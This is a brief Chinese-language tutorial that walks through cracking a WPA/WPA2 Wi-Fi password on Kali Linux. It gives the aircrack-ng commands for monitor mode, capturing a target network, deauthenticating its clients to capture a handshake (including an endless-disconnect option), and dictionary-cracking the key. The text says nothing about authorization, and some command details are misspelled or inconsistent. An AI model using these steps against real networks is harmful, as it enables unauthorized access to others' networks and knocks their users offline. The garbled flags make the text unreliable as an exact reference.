WIFI WPA/WPA2加密方式

1.1 准备无线网卡

注意kail支持的哪些芯片的无线网卡

1.2 无线网卡接入虚拟机

1.3 查看无线网卡信息

root@KALI-EXPLOIT:~# iwconfig
root@KALI-EXPLOIT:~# airmon-ng

1.4 开启无线网卡监听模式

root@KALI-EXPLOIT:~# airmon-ng start wlan0(根据上一步查看到的设备名)

默认是接入模式，这个命令是开启监听模式

1.5 监听周围无线网络信息

root@KALI-EXPLOIT:~# airodump-ng wlan0mon(根据上一步的到的设备名)

1.6 如果不能监听，需要设置Monitor模式

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

这个是可能会出现的问题，没有遇到选择跳过

1.7 监听感兴趣的无线网络

root@KALI-EXPLOIT:~# airodump-ng -c 6 --bsssid AP's MAC -w  wep wlan0mon

-c 后面的6为AP工作频道，-bissid 面为AP MAC地址
-w 后面的wep是抓下来的数据包DATA保存的文件名

1.8 得到握手包

保持上一步的窗口不关，新开一个窗口，执行以下命令：

aireplay-ng -a AP-MAC -c 切断客户端的MAC（重新连接） -0  5 (发送次数一般5次就够) wlan0mon(网卡名称)

截图： 成功获取握手包

解析： -0为模式的一种：冲突攻击模式，后面跟发送次数（设置为0，则为循环攻击，不停的断开）
-a AP-MAC指定无线AP的mac地址，即为该无线网的bssid值, -c 为客户端mac，即为STATION值

1.9 获取密码

aircrack-ng tmp-01.cap -w /tmp/passwd.txt

截图：

破解成功后会出现：KEY FOUND!后中括号中间就是wifi密码